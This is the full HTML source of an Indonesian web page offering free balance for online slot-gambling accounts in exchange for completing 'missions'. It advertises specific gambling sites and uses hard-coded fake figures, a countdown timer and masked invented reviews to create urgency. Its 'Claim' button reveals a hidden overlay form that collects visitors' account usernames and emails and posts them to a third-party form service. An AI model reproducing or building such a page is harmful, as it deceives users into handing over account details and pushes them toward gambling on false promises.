<!DOCTYPE HTML>
<html>
<head>
    <meta name='google' content='notranslate'>
    <title>Jastiip app | riiins-beta</title>
    <meta name="description" content="Jasa pengantaran banyumas" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no">
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
                integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
                crossorigin="anonymous"></script>
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js" crossorigin="anonymous"></script>
     <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
     <style>
        h1,h2,h3,h4,h5,h6{margin:0;}
        body{background-color:black;color:white;}
        .col{display:flex;justify-content: center;flex-direction: column;align-items: center;}
        .col-2{display:flex;justify-content: start;flex-direction: column;align-items:flex-start;}
        .row{display:flex;justify-content: center;flex-direction: row;align-items: center;}
        .row-2{display:flex;flex-direction: row;justify-content: start;align-items:flex-start;}
        .header-1{border-top: 2px rgb(250, 222, 65) solid;border-bottom: 2px rgb(250, 222, 65) solid;margin: 20px 20px;padding:10px 20px;font-size:20px;}
        .mrg{margin:15px;}
        .ctr{text-align: center;}
        .sld-1{width:80%;height:20px;border:1px solid rgb(250, 222, 65);border-radius:15px;}
        .sld-1-inner{width:70%;height:100%;background-color:rgb(250, 222, 65);border-radius:15px;}
        .sled {position:relative;animation:slide 2s infinite;border-radius:15px;}
        @keyframes slide {
            0% {background-color:rgb(252, 252, 141);width:0;height:100%;border-radius:15px;}
            100% {background-color:rgb(252, 252, 141);width:100%;height:100%;border-radius:15px;box-shadow:0 0 7px red;}
        }
        .plx{display:flex;flex-direction: row;justify-content: space-between;align-items: center;}
        .trx{background-color:rgb(250, 222, 65);color:black;padding:10px 10px;margin:5px 10px;border-radius:15px;font-size:15px;}
        .cda{background-color:rgb(250, 222, 65);color:black;padding:10px 20px;border-radius:15px;margin:0 auto;}
        .onet{color:rgb(202, 24, 24);padding:10px 20px;border-radius:15px;}
     </style>
</head>
<body>
    <header>
        <div class="col">
            <img src="https://i.postimg.cc/y6r2cqG4/Logo-ST.png" width="50%">
        </div>
        <div class="row header-1">
            <h3 class="mrg">JASATOTO99</h3>
            <h3 class="mrg">CECE188</h3>
            <h3 class="mrg">TIMNAS4D</h3>
        </div>
        <h5 class="mrg ctr">Dapatkan saldo gratis untuk akun slot kesayanganmu dengan mengikuti misi mudah dibawah!</h5>
        <br>
        <h5 class="mrg ctr onet">1 Akun hanya berlaku 1 kali!</h5>
        <div class="col">
            <div class="sld-1">
                <div class="sld-1-inner">
                    <div class="#sled"></div> <!-- this -->
                </div>
            </div>
        </div>
        <br>
        <br>
        <div class="plx">
            <div>
                <span class="trx">Sisa saldo : IDR 45.260.500;-</span>
            </div>
            <div>
                <span class="trx">User Menyelesaikan misi : 431</span>
            </div>
        </div>
        <br>
        <br>
        <h4 class='ctr'>Saldo gratis berakhir dalam :</h4>
        <br>
        <div class="col">
            <div class="cda" id="cd"></div>
        </div>
        <br>
        <br>
        <img src="https://jasatoto999.biz/images/upload-Slides-20230102140807.jpg" width="100%" height="100px">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguMqflEiLkBG4zttwb1TnwktpAzKlM-KVpiLs-fJLZ4kx5-IE4m7TYflXZGdYjVImW1fsUuDgebW6obIAmEKBhy50S79Fux9CjLHG0xpoQlnH0lA5vcID2d0NHg3mNHDLLi1M4iOMwVcmtyC2yUP4I1TRFijJ_BKugrcTuSLhNgX0Tj_Iqmh4RvpHt/s16000/Cece188-Promo1.jpg" width="100%" height="100px">
        <img src="https://timnasplay.com/images/upload-Slides-20210717151432.jpg" width="100%" height="100px">
    </header>
    <br><br>
    <main>
        <style>
            .misi-1{background-color:rgb(247, 226, 111);color:black;text-align: center;padding:20px 10px;border-radius:25px;}
            .big{font-size:80px;}
            .btn{background-color:darkslategrey;color:white;border:none;margin:5px;padding:5px 10px;border-radius:10px;display:flex;justify-content:center;align-items:center;}
            .foot-2{background-color:rgb(19, 19, 19);color:azure;padding:20px 20px;}
            .fl-left{display:flex;position:relative;float:left;}
            .fl-right{display:flex;position:relative;float:right;}
            .gt{font-size:30px;margin-right:15px;}
            .a1{color:green;}
            .a2{color:orange;}
            .a3{color:cyan;}
            .a4{color:magenta;}
            .a5{color:white;}
            a{text-decoration:none;}
        </style>
        <div class="misi-1">
            <h1>Share whatsapp</h1>
            <br>
            <h5>Tingkat kesulitan : C</h5>
            <br>
            <h1 class="big">+Rp.80.000</h1>
            <br>
            <div class="row">
                <a class="show" target="_blank" href="whatsapp://send?text=Saldo-gratis-cuy"><button class="btn">Share<span class="material-symbols-outlined" style="margin-left:5px;">
                    share
                    </span></button></a>
                <span class="btn claim" id="waa">Claim</span>
            </div>
        </div>
        <br>
        <br>
        <div class="misi-1">
            <h1>Isi survey</h1>
            <br>
            <h5>Tingkat kesulitan : B</h5>
            <br>
            <h1 class="big">+Rp.100.000</h1>
            <br>
            <div class="row">
                <button class="btn">Isi survey <span class="material-symbols-outlined" style="margin-left:5px;">
                    content_paste
                    </span></button>
            </div>
        </div>
        <br>
        <br>
        <div class="misi-1">
            <h1>Pelipat ganda</h1>
            <br>
            <h5>Tingkat kesulitan : A</h5>
            <br>
            <h1 class="big">+Rp.200.000</h1>
            <br>
            <div class="row">
                <button class="btn">Mainkan <span class="material-symbols-outlined" style="margin-left:5px;">
                    play_circle
                    </span></button>
            </div>
        </div>
        <br>
        <br>
        <h3>User review (<strong style="color:yellow"> 300+ </strong>)</h3>
        <br>
        <div class="col-2">
        <div class="fl-left">
            <div class="col-2">
                <div class="row-2">
                    <span class="material-symbols-outlined gt a1">
                        account_circle
                        </span>
                    <div class="col-2">
                        <h5>S***** A***</h5>
                        <h6><i>Wah gilaa sii beneran dapet, makasih yak..</i></h6>
                    </div>
                </div>
            </div>
        </div>
        <br>
        <div class="fl-right">
            <div class="col-2">
                <div class="row-2">
                    <span class="material-symbols-outlined gt a2">
                        account_circle
                        </span>
                    <div class="col-2">
                        <h5>B****** M******</h5>
                        <h6><i>Lumayan gak depo hari ini</i></h6>
                    </div>
                </div>
            </div>
        </div>
        <br>
        <div class="fl-right">
            <div class="col-2">
                <div class="row-2">
                    <span class="material-symbols-outlined gt a3">
                        account_circle
                        </span>
                    <div class="col-2">
                        <h5>T*** S*****</h5>
                        <h6><i>Yang belum masuk coba mode pesawat dulu</i></h6>
                    </div>
                </div>
            </div>
        </div>
        <br>
        <div class="fl-right">
            <div class="col-2">
                <div class="row-2">
                    <span class="material-symbols-outlined gt a4">
                        account_circle
                        </span>
                    <div class="col-2">
                        <h5>J*** G****</h5>
                        <h6><i>Saya dapat yang 200, memang sangat susah tapi saya berhasil</i></h6>
                    </div>
                </div>
            </div>
        </div>
        <br>
        <div class="fl-right">
            <div class="col-2">
                <div class="row-2">
                    <span class="material-symbols-outlined gt a5">
                        account_circle
                        </span>
                    <div class="col-2">
                        <h5>D**** L****</h5>
                        <h6><i>Punya 2 akun masuk semua dananya, makasih bang.</i></h6>
                    </div>
                </div>
            </div>
        </div>
        <br>
        . . . .
        <br>
        <br>
        <h5>## Can't show review more than 5 <i style="color:red">{ limiting-block }</i></h5>
        </div>
    </main>
    <br><br>
    <footer>
        <style>
            .gk{font-size:70px;margin:20px;}
            .b1{color:rgb(246, 89, 89);}
            .b2{color:rgb(91, 248, 91);}
            .b3{color:rgb(105, 105, 245);}
        </style>
        <div style="border-bottom:1px solid grey;height:10px;width:60%;margin:0 auto;"></div>
        <br>
        <div class="foot">
            <div class="col">
                <h1>Support by</h1>
                <br>
                <div class="row">
                    <div class="col">
                        <span class="material-symbols-outlined gk b1">
                            webhook
                            </span>
                        <span>WEBmit</span>
                    </div>
                    <div class="col">
                        <span class="material-symbols-outlined gk b2">
                            account_tree
                            </span>
                        <span>AVB-money</span>
                    </div>
                    <div class="col">
                        <span class="material-symbols-outlined gk b3">
                            donut_small
                            </span>
                        <span>Jackpoter</span>
                    </div>
                    
                </div>
            </div>
        </div>
        <br>
        <br>
        <div class="foot-2">
            <div class="col">
                <h4>Tentang situs</h4>
                <h6>Situs bagi saldo gratis untuk akun slot dengan cara menyelasaikan misi.</h6>
                <br>
                <h4>Sumber dana</h4>
                <h6>Marketing, Ads, Kolektif.</h6>
                <br>
            </div>
            <div class="col">
                <h4>Slot gacor</h4>
                <h6>Saldo yang didapat akan menambah hoki kalian.</h6>
                <br>
                <h4>Open-trick</h4>
                <h6>Hanya akun yang sudah aktif 30 hari+ yang valid.</h6>
                <br>
            </div>
            <div style="border-bottom:1px solid grey;height:10px;width:60%;margin:0 auto;"></div>
            <br>
            <br>
            <div class="col">
                <h6>FreeSpin|FreeDeposit</h6>
                <h6>2022</h6>
            </div>
        </div>
    </footer>
    <style>
        .wa-login{display:none;position:fixed;width:100%;height:100%;background-color:grey;color:white;z-index:3;padding:10px;top:0;left:0;right:0;bottom:0;}
        .claim{display:none;}
        form{display:flex;flex-direction:column;justify-content:start;}
        form.input{margin:5px;}
    </style>
    <div class="wa-login">
        <div class="col">
        <form action="https://api.staticforms.xyz/submit" method="post">
            <input type="text" name="name" placeholder="Username kamu">
            <input type="text" name="email" placeholder="Email kamu" />
            <input type="text" name="honeypot" style="display:none">
            <input type="hidden" name="accessKey" value="0b9219a7-9fc3-4bb1-89b0-2009dd01526a">
            <input type="hidden" name="subject" value="Contact us from - example.com" />
            <input type="hidden" name="replyTo" value="@">
            <input type="hidden" name="redirectTo" value="https://www.riins.xyz/pl">
            <input type="submit" value="Submit" />
        </form>
        </div>
    </div>
    

    <script>
        var countDownDate = new Date("Mar 30, 2023 00:00:00").getTime();
        var x = setInterval(function() {
          var now = new Date().getTime();
          var distance = countDownDate - now;
          var days = Math.floor(distance / (1000 * 60 * 60 * 24));
          var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
          var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
          var seconds = Math.floor((distance % (1000 * 60)) / 1000);
          document.getElementById("cd").innerHTML = days + " hari " + hours + " jam";
          if (distance < 0) {
            clearInterval(x);
            document.getElementById("cd").innerHTML = "0";
          }
        }, 1000);
        </script>
        <script>
            $('#waa').click(
              function(){
              $('.wa-login').css(
              'display', 'block');
              $('.claim').css('display', 'block');
              });
              $('#wa-c').click(
              function(){
              $('.wa-login').css(
              'display', 'none');
              });
              </script>
              <script>
                $('a.show').click(
                  function(){;
                  $('.claim').css('display', 'block');
                  });
                  </script>
    </body>
    </html>
